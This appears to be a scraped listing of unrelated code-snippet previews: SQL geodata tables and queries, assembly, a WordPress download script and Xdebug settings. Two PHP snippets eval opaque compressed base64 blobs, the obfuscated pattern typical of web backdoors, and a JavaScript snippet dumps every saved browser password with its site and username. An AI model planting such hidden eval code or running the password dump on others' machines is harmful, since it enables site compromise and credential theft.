This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CREATE TABLE `geoname` ( | |
`geonameid` int(11) unsigned NOT NULL AUTO_INCREMENT, | |
`name` varchar(200) DEFAULT NULL, | |
`asciiname` varchar(200) CHARACTER SET ascii DEFAULT NULL, | |
`alternatenames` varchar(10000) CHARACTER SET ascii DEFAULT NULL, | |
`latitude` double DEFAULT NULL, | |
`longitude` double DEFAULT NULL, | |
`feature class` char(1) DEFAULT NULL, | |
`feature code` varchar(10) DEFAULT NULL, | |
`country code` char(2) DEFAULT NULL, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SET | |
@orig_latitude = 32.867073, | |
@orig_longitude = -96.769410, | |
@radius = 10 | |
; | |
SELECT * | |
FROM ( | |
SELECT | |
`geonameid`, `name`, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DEFAULT REL | |
%define SYSCALL_WRITE 0x2000004 | |
%define SYSCALL_EXIT 0x2000001 | |
section .data | |
section .bss | |
section .text | |
global start |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
curl -L http://wordpress.org/latest.tar.gz | tar -zxv --exclude='wp-content' --exclude='wp-config-sample.php' --exclude='readme.html' --strip-components=1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php eval(gzuncompress(base64_decode("eJw1jsEKAjEMRH9lWQppUUFXULEGEbx48aI3EVncVgvaLG3Bix9vsuAh8GaYGaJuHULnfIgOrLo5BHd/kqBH8A9XsjAhUOqEeoSePgM1jCnE4kVlhFxSoRd9XBqMZnBeLooqCCWFt2CnYQfjarGcTVerxdzYSnmcWpWRS5qjfF6fzvvD0RhjPSWtggTCRla1yoZ5NDLKf7nS62bMDWL/osLVTIShBenKk5rXEXfbum/jI7Xvel1HKtVfGfsDqyZKXQ=="))); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var decryptedRow=""; | |
var pm = PasswordManager.getInstance(); | |
var model = pm.savedPasswordsList_.dataModel; | |
var pl = pm.savedPasswordsList_; | |
for(i=0;i<model.length;i++){ | |
PasswordManager.requestShowPassword(i); | |
}; | |
setTimeout(function(){ | |
decryptedRow += '"hostname","username","password","formSubmitURL","httpRealm","usernameField","passwordField"'; | |
for(i=0; i<model.length; i++){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Enable xdebug extension module | |
zend_extension=/usr/lib64/php/modules/xdebug.so | |
xdebug.remote_enable=1 | |
xdebug.remote_handler=dbgp | |
xdebug.remote_host=10.0.2.2 | |
xdebug.remote_port=9001 | |
xdebug.remote_log=/var/log/xdebug/xdebug.log |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// ... | |
eval(gzuncompress(base64_decode("eJx9jkuLwjAYRf/KrRSagKjxgVYpsxgEFwOVWtyIlGi/2". | |
"mBfJBkfyPz3UUSXns1dnMW5bqNrW+/rAgGYMoYsc5PVPFrPo4333GQZhXH4Hf54W44vfNCYwlvE8b". | |
"IrOj2Pz6AyVtpEyyplovei7b/hCAL0xXDii8FoOObISaakWevmvm79wRcCCyoaB3FOVxj7m2WUoiS". | |
"oCjZXBrv60sY9AqkJpTyq6vDQhvSJcKZdIw9knBaf/QPXpkaG"))); |